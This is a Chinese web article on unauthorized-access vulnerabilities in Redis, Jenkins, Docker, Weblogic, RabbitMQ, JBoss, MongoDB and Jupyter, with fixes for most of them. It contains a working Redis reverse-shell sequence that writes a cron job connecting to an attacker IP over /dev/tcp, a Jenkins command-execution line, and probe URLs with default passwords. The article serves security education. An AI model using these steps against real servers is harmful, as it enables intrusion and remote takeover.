Web漏洞-未授权访问漏洞
创始人
2025-05-31 19:45:16

未授权访问漏洞

漏洞介绍:

未授权访问漏洞就是在不需要请求授权的情况下对需要授权的功能进行访问执行,通常是由于认证页面存在缺陷,安全配置不当。

漏洞原理:

未授权访问是系统对用户的限制不全,或者无限制,可以让用户或者限制访问的用户,访问到内部的敏感信息,执行权限之外的功能。

越权漏洞:

水平越权:水平越权是同等权限下,不同用户直接的切换,访问到对方的敏感信息,造成信息泄露。

垂直越权:垂直越权是在低权限用户下,可以执行高权限用户的功能。

漏洞危害:

未授权访问通常会造成以下几点危害:(简要概括)

  1. 泄露用户信息,系统信息

  1. 执行系统命令,操作系统文件,导致系统整体安全遭到破坏

常见的未授权访问漏洞

1、Redis未授权访问漏洞:

redis默认开放6379端口,如果没有采用相关的策略,比如添加防火墙规则来避免非信任来源ip,这样就会将redis服务暴露在公网上,如果默认密码为空的情况下,会导致任意用户在访问目标服务器的情况下未授权访问redis以及读取Redis的数据。

可以利用redis提供的config命令进行文件写操作,还可以将自己的ssh公钥写入目标服务器中,进而使用自己的私钥进行ssh登录目标服务器。

下面介绍一下反弹shell的操作:

redis-cli -h 192.168.56.130
set x "\n* * * * * bash -i >& /dev/tcp/192.168.56.104/7979 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

2、Jenkins未授权访问:

默认情况下,Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可以通过未授权访问漏洞或者暴力破解用户密码,进入脚本执行界面从而获取服务器权限。

操作:

①端口扫描
②直接通过url输入下面地址,若能访问,则证明漏洞存在
http://targetip:8080/manage
http://targetip:8080/script
③命令格式
println 'whoami'.execute().text

修复:

  • 对后台控制页面进行登录验证限制

  • 升级Jenkins至新版本

  • 禁止把Jenkins直接暴露在公网

3、Docker未授权访问

该漏洞是因为docker api可以执行docker命令,该接口的目的是取代docker命令界面,通过url操控docker

操作

①端口扫描
②输入url:http://ip:2375/version查看是否能访问,若能访问则证明漏洞存在

修复:

  • 对2375端口做网络访问控制,如ACL控制,或访问规则

  • 修改docker swarm的认证方式,使用TLS认证

4、Weblogic未授权访问

Weblogic是J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证直接访问后台,同时,CVE-2020-14883允许后台任意用户通过http协议执行任意命令

危害:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管WebLogic Server Console,并执行任意代码

修复:下载补丁程序并安装更新

5、RabbitMQ未授权访问(15672、15692、25672)

RabbitMQ是一款消息中间件,可以在发布者和使用者直接交互异步消息

操作:

①端口扫描
②浏览器访问测试,默认密码都是guest
http://ip:15672
http://ip:15692
http://ip:25672

修复:

  • 修改为强密码,删除默认账户

  • 禁止对外网开放,仅限内部访问

6、JBoss未授权访问

JBoss是J2EE应用的中间件平台,默认情况下访问http://ip:8080/jmx-console就可以浏览JBoss部署的管理信息,不需要输入用户名和密码就可以部署上传木马。

操作

①端口扫描
②直接访问http://ip:port/查看是否能进入jmx-console和web-console页面
http://ip:8080/
http://ip:8080/jmx-console/
http://ip:8080/jbossws/

修复

  • 添加JMX控制页面身份认证

  • 进行JMX Console安全配置

  • 关闭jmx-console和web-console

7、MongoDB未授权访问

开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录用户可以通过默认端口无需密码对数据库进行任意操作

根本原因是:在启动时未设置-auth,很少会有人给数据库添加账号密码

修复

  • 启动认证

  • 设置防火墙策略,限定ip访问服务

  • 限制绑定IP,启动时加入参数--bind_ip 127.0.0.1或在/etc/mongodb.conf文件中添加以下内容:bind_ip = 127.0.0.1;

8、Jupyter Notebook未授权访问

python的交互式笔记本,如果管理员未对其配置密码,将会导致未授权访问漏洞,用户可以创建一个console并执行任意python代码和命令

修复

  • 开启身份认证,防止未经授权用户访问

  • 访问控制策略,限制ip访问,绑定固定ip

9、WordPress未授权访问

CVE-2019-17671

相关内容

热门资讯

【实验报告】实验一 图像的... 实验目的熟悉Matlab图像运算的基础——矩阵运算;熟悉图像矩阵的显示方法࿰...
MATLAB | 全网最详细网... 一篇超超超长,超超超全面网络图绘制教程,本篇基本能讲清楚所有绘制要点&#...
大模型落地比趋势更重要,NLP... 全球很多人都开始相信,以ChatGPT为代表的大模型,将带来一场NLP领...
Linux学习之端口、网络协议... 端口:设备与外界通讯交流的出口 网络协议:   网络协议是指计算机通信网...
kuernetes 资源对象分... 文章目录1. pod 状态1.1 容器启动错误类型1.2 ImagePullBackOff 错误1....
STM32实战项目-数码管 程序实现功能: 1、上电后,数码管间隔50ms计数; 2、...
TM1638和TM1639差异... TM1638和TM1639差异说明 ✨本文不涉及具体的单片机代码驱动内容,值针对芯...
Qt+MySql开发笔记:Qt... 若该文为原创文章,转载请注明原文出处 本文章博客地址:https://h...
Java内存模型中的happe... 第29讲 | Java内存模型中的happen-before是什么? Java 语言...
《扬帆优配》算力概念股大爆发,... 3月22日,9股封单金额超亿元,工业富联、鸿博股份、鹏鼎控股分别为3.0...
CF1763D Valid B... CF1763D Valid Bitonic Permutations 题目大意 拱形排列࿰...
SQL语法 DDL、DML、D... 文章目录1 SQL通用语法2 SQL分类3 DDL 数据定义语言3.1 数据库操作3.2 表操作3....
文心一言 VS ChatGPT... 3月16号,百度正式发布了『文心一言』,这是国内公司第一次发布类Chat...
CentOS8提高篇5:磁盘分...        首先需要在虚拟机中模拟添加一块新的硬盘设备,然后进行分区、格式化、挂载等...
Linux防火墙——SNAT、... 目录 NAT 一、SNAT策略及作用 1、概述 SNAT应用环境 SNAT原理 SNAT转换前提条...
部署+使用集群的算力跑CPU密... 我先在开头做一个总结,表达我最终要做的事情和最终环境是如何的,然后我会一...
Uploadifive 批量文... Uploadifive 批量文件上传_uploadifive 多个上传按钮_asing1elife的...
C++入门语法基础 文章目录:1. 什么是C++2. 命名空间2.1 域的概念2.2 命名...
2023年全国DAMA-CDG... DAMA认证为数据管理专业人士提供职业目标晋升规划,彰显了职业发展里程碑及发展阶梯定义...
php实现助记词转TRX,ET... TRX助记词转地址网上都是Java,js或其他语言开发的示例,一个简单的...
【分割数据集操作集锦】毕设记录 1. 按要求将CSV文件转成json文件 有时候一些网络模型的源码会有data.json这样的文件里...
Postman接口测试之断言 如果你看文字部分还是不太理解的话,可以看看这个视频,详细介绍postma...
前端学习第三阶段-第4章 jQ... 4-1 jQuery介绍及常用API导读 01-jQuery入门导读 02-JavaScri...
4、linux初级——Linu... 目录 一、用CRT连接开发板 1、安装CRT调试工具 2、连接开发板 3、开机后ctrl+c...
Urban Radiance ... Urban Radiance Fields:城市辐射场 摘要:这项工作的目标是根据扫描...
天干地支(Java) 题目描述 古代中国使用天干地支来记录当前的年份。 天干一共有十个,分别为:...
SpringBoot雪花ID长... Long类型精度丢失 最近项目中使用雪花ID作为主键,雪花ID是19位Long类型数...
对JSP文件的理解 JSP是java程序。(JSP本质还是一个Servlet) JSP是&#...
【03173】2021年4月高... 一、单向填空题1、大量应用软件开发工具,开始于A、20世纪70年代B、20世纪 80年...
LeetCode5.最长回文子... 目录题目链接题目分析解题思路暴力中心向两边拓展搜索 题目链接 链接 题目分析 简单来说࿰...